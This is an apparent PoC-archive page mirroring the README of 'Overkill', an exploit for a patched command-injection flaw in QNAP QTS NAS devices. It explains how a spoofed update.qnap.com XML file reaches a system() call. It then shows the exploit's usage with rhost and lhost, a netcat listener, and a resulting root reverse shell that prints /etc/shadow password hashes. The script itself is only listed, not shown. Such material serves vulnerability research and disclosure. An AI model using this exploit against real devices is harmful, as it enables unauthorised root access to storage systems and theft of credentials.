Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-2509 PoC — Qnap Systems QNAP QTS和QNAP Systems QUTS Hero 命令注入漏洞

Source
https://github.com/jbaines-r7/overkill
Associated Vulnerability
Title:Qnap Systems QNAP QTS和QNAP Systems QUTS Hero 命令注入漏洞 (CVE-2020-2509)
Description:Qnap Systems QNAP QTS是中国Qnap Systems公司的一款类似SAN存储架构的数据存储设备。该设备支持分层存储、镜像保护等保障功能。QNAP Systems QUTS Hero是中国QNAP Systems公司的一款用于管理文件的NAS操作系统。该系统保留了QTS的应用生态,整合更强大的128位ZFS文件系统,为企业提供更稳定可靠的NAS存储解决方案。 QTS and QuTS hero 存在命令注入漏洞,该漏洞源于攻击者可利用该漏洞就可以在一个被破坏的应用程序中执行任意命令。
Description
QNAP N-Day (Probably not CVE-2020-2509)
Readme
# Overkill

Overkill is an exploit for a patched vulnerability affecting QNAP QTS. Due to the way QNAP discloses vulnerabilities, I'm unsure if this issue has a CVE or not. However, it was likely patched in November 2020 and April 2021. The n-day was "discovered" while doing diff analysis for CVE-2020-2509. This is almost certainly not CVE-2020-2509. 

The exploit will send HTTP GET requests to `/cgi-bin/qnapmsg.cgi?lang=xxx` which will cause unpatched QNAP devices to download an XML file from `update.qnap.com` via insecure HTTP. An attacker that can redirect `update.qnap.com` to themselves can respond with an attacker controlled XML file. When the QNAP parses the XML file it will pass some of the contents to a `system` call, resulting in a reverse shell.

This exploit *does not* implement the method to get `update.qnap.com` requests directed to the exploit. In the example below, I was using router DNS hijacking on my own router... your mileage may vary.

## Usage Example

```
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252

01001001001000000110001101100001011011100010011101110100001000000110011101100101
    ______  ___      ___  _______   _______   __   ___   __    ___      ___ 
   /    " \|"  \    /"  |/"     "| /"      \ |/"| /  ") |" \  |"  |    |"  |
  // ____  \\   \  //  /(: ______)|:        |(: |/   /  ||  | ||  |    ||  |
 /  /    ) :)\\  \/. ./  \/    |  |_____/   )|    __/   |:  | |:  |    |:  |
(: (____/ //  \.    //   // ___)_  //      / (// _  \   |.  |  \  |___  \  |___
 \        /    \\   /   (:      "||:  __   \ |: | \  \  /\  |\( \_|:  \( \_|:  \
  \"_____/      \__/     \_______)|__|  \___)(__|  \__)(__\_|_)\_______)\_______)

01110100001000000111010001101111001000000111001101101100011001010110010101110000

                                🦞 jbaines-r7

[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:!:19181:0:99999:7:::
bash-3.2# exit  
```

## Credit

* [Overkill](https://www.youtube.com/watch?v=vB_IynOTQU0) by Lazlo Bane featuring Colin Hay
File Snapshot

 [4.0K]  /data/pocs/fc70c1e3a2e947bf13e9d8c2cb8134af2e2495a3
├── [1.5K]  LICENSE
├── [4.8K]  overkill.py
└── [2.8K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.